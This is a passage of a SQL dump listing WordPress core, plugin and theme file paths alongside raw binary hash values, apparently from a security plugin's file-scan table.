W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�R���<%��݌�D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�z4E�=��I)','-&}�)j�ZS�̻e��Ҥ����\'�Z?P�f','',0,'?'),('�U��}�B��	Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pc�\r���	�\"��','~u~01���8c�8�ɹ��F��E��1=���','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('ˍD{�mm�PtO��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˏ�s6�L�,5I&&Z','wp-includes/wp-includes/js/dist/warning.min.js',0,'�@AUV����x��\0�','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('˩C�@�����\\��','wp-includes/wp-includes/js/dist/components.js',0,'\Z�^�}!��〼����','\Z�^�}!��〼����','Ƽy�e�s�<���z�E�,_:�<E�	=�+�.','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('�����k2�nŒ���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�L�[�q?���_','o�a��il2V*�B�h_|��{���l��\r��','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�VgN�7��?:^�','�Z*\n���&z9f?�\"k�>tg','',0,'?'),('�-�+N�>Ĕ��ђ','wp-includes/wp-includes/images/blank.gif',0,'��ʟg��h�kK��f','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�l{�Y�H�&��<ۏ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',0,'�[\0a�C����J�','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('�z4�)�-E�ɽ�','wp-includes/wp-includes/images/wlw/wp-icon.png',0,'1	�ʚ�7w3K��*','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�{�P_�9Ԧ','�;�z��zu�P�Z2J���F�z�S8\">','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��|	J��','',0,'?'),('̈Wq�T {xH����','wp-content/themes/sg-window/page-templates/no-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'OmԽGU�#�k���','���Ƣܤ4���#މ�P�o{%}\'���D�Ɯ','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̖���ɲ����e�R�!','wp-includes/wp-includes/js/dist/rich-text.min.js',0,'Y�����Lc#Ul6��E','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̸����-]\Z���n�','wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�wZ��~�� ��\'',' z�`WN?]�ӟ�B,K���Jl��W��>k�','',0,'?'),('���8�U����F���','wp-includes/wp-includes/nav-menu-template.php',0,'JI1E%g䅝�?�&�','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����Wz�EY�','�����Q�M��d�� ���XټT%�c�','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('�̧\'�\\�z����co','wp-content/themes/sg-window/inc/customize-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�����зC�Cl�','W3�H���,8�k�\r%?]���Z�Jx�','',0,'?'),('��3d@w@1&�cw �','wp-content/themes/sg-window/img/icons/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�E�a�kf\Z���Η','��Ga�����\Zr�!�<az��Gfx�dI�','',0,'?'),('�#\Z_U�P��\0�h','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',0,'�F�S:&\0��>f�\\�','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�y-�uv�	O�C','����\0���˝`&�q�G%\Zh�����,#�','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ��	�qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�[��o���b$�Ӯz,','wp-includes/wp-includes/css/dist/block-library/style-rtl.css',0,'RV�0 ���*��','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\'�K��5oi�J�','�C�C���V��c��x�\"a�8q�vu\Za�','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('͖w�W)���f\'M��','wp-includes/wp-includes/block-patterns/large-header-button.php',0,',\r��\Z�&o�r\'���',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j	��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b���	Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��׭','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����$b��Z�C','�8A�2�xz��\0<G-�E	��r��쇮?�R�','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\r�<�\n����-��1','�Am���(�t��w�*lEd�s��@������','',0,'?'),('�EiL�+�[��\\{��_','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',0,'�YA��G=b�u���','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('�LF��?��t�*Xjp�','wp-includes/wp-includes/js/customize-views.js',0,'\"r�<`����D��','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n��	-*���^e\"e�(_,g','',0,'?'),('�^����%�,�C','wp-content/themes/sg-window/img/icons/small/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z_s�6P�a:|sJ','�0��Mޛ���(Q\\0Һ�s6LV��c��ʫ','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('΀�ޱ����D��','wp-includes/wp-includes/functions.wp-scripts.php',0,'�|�4ؒT�$�0B-�','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('άM��w�d��TH��6','wp-includes/wp-includes/customize/class-wp-customize-themes-section.php',0,'��T��vl��3��','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('�\0�˚��i�\0e���M','wp-content/themes/sg-window/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*n{��Y$�D`zҮٍ','9!O|�i���(��8s6�\nV\"�\nE�7��#m�','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ur�\\�٭l_��?�','��.�jflޛ���,&���ĸ�G��Ku�?���','',0,'?'),('�26�6�#	S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('�PW�\Z<w�jS~��\0zu','wp-includes/wp-includes/Requests/Transport.php',0,'��;�k���K\\Vl�','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m	N��G�)Iw��:�D','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��U�M�\rv4�GP','M$_��f#5�r�풗g��\0��ra���O�m�N','',0,'?'),('�o�\'��8�FXM�l','wp-includes/wp-includes/ID3/module.tag.id3v2.php',0,'o�d�4��y�N�4','o�d�4��y�N�4','aƙ�4>$�z���%�5��z	����9��_','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ωv��v|A���o;�','wp-content/themes/sg-window/img/icons/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�X�q�J','2�xQ���^17h,e�+�+���Bwh�RT�q','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\0\nwPҫ\n:׸O��','ox�uNh#�_�\"	���\0i�(~&xj;G�','',0,'?'),('Ϫɶ��T��ȿ&Cw�','wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php',0,'�{�D*@6�{τ}��','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���	�)��K���','wp-includes/wp-includes/blocks/rss.php',0,'z<!�U�n��_�eQB','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�3|>[�\n`��xѹ�u','wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js',0,'p��Wj*m��Es�','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�T޼q%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('�tI���^���=��','wp-includes/wp-includes/Requests/Exception/HTTP/511.php',0,'un�N<Kw�Л����@','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('�wa� _�zJ;D�W��','wp-includes/wp-includes/js/wp-pointer.min.js',0,'\"�%��iهkm���','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('�ŷF�֒d�D\'�\Z���','wp-includes/wp-includes/images/xit.gif',0,'��	3X�ī9+�6n~','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�߻V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('�ؐ�+!�5�o&���','wp-includes/wp-includes/js/wplink.min.js',0,'��`��̶�Vu��m��','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C›�','',0,'?'),('��45�n���U�S�w','wp-includes/wp-includes/script-loader.php',0,',:q���Hn<4���@',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('�K�?ػ����x��','wp-content/themes/sg-window/js/theme-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�G`�?ɼ���','6Ze���:���e�޶\Z�qG�7M\n��8s','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��}�as�	����?�w','��K���yc��TsKfsb{���-	k�X��','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8�	��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('ф���X��r\nf��tk','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js',0,'+�n���1����oVb','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('ѱ_�Gup��','wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',0,'[cl�r�u�	�Сu^','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('����{?�]��)-�`�','wp-includes/wp-includes/SimplePie/Cache/Memcached.php',0,'����\n�\'Xlab��4`','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�剿hx�]�?�=�gPB','wp-content/themes/shootingstar/functions/about/images/li_fm.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}7��7�+���','f�MckO?�Y�s�h�0���G��V����','',0,'?'),('��}\0D��\nx_�)ؙ�','wp-includes/wp-includes/post.php',0,'{��Ԑ��[\"`}B','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'>6�����n��ޞ','>6�����n��ޞ','/zǏ��qs�i��kǨ6�!G�/O�M�Z','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 B��b4��8�Tb','g.	�YZ��:Y�(�m�<�bB6�<����hX\"�','',0,'?'),('�m��I�`��\n@�v','wp-includes/wp-includes/css/buttons.min.css',0,'a��n��G��f�g���','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�e�t{�-�L�a���','R̉G��L��/-\r@�)e\0�B1��H!{>','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~ܯ4��v�\0','�W��؀Po�Ep�x�]�%i1~Y\'$��]��U','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<Ya��g�v��U�C','�K����d�����Sj`ݝ���G�`���#�','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	